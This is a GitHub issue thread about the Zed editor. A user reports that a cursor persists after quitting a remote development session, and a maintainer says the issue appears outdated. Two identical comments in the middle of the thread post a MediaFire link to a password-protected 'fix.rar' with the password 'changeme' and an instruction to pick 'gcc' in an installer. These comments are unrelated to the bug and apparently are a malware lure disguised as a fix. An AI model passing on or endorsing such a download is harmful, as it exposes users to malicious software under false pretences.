### ISSUE TITLE
Cursors persist after ending remote session

### ISSUE THREAD

**Issue by liamd101** [zed-industries/zed#16925]
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

When closing a remote development session in Zed using `CMD+q` (to close all instances of Zed), a cursor persists. The cursor still persists after closing the connection to the server (in my case, disabling my VPN) and reconnecting.

To recreate, connect to a remote environment, enter a file, and close Zed using `CMD+q`. The cursor will persist in the same location that it was in when the application closed.

### Environment

Zed: v0.149.5 (Zed)
OS: macOS 15.0.0
Memory: 16 GiB
Architecture: aarch64

### If applicable, add mockups / screenshots to help explain present your vision of the feature

<img width="398" alt="image" src="https://github.com/user-attachments/assets/a04514ae-904e-4eb9-b518-3f6cc94ade25">

### If applicable, attach your Zed.log file to this issue.

<details><summary>Zed.log</summary><pre>

</pre></details>

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrnugget** [comment]
Pretty sure this is outdated now. We've changed how Zed remote development works quite a bit: https://zed.dev/docs/remote-development
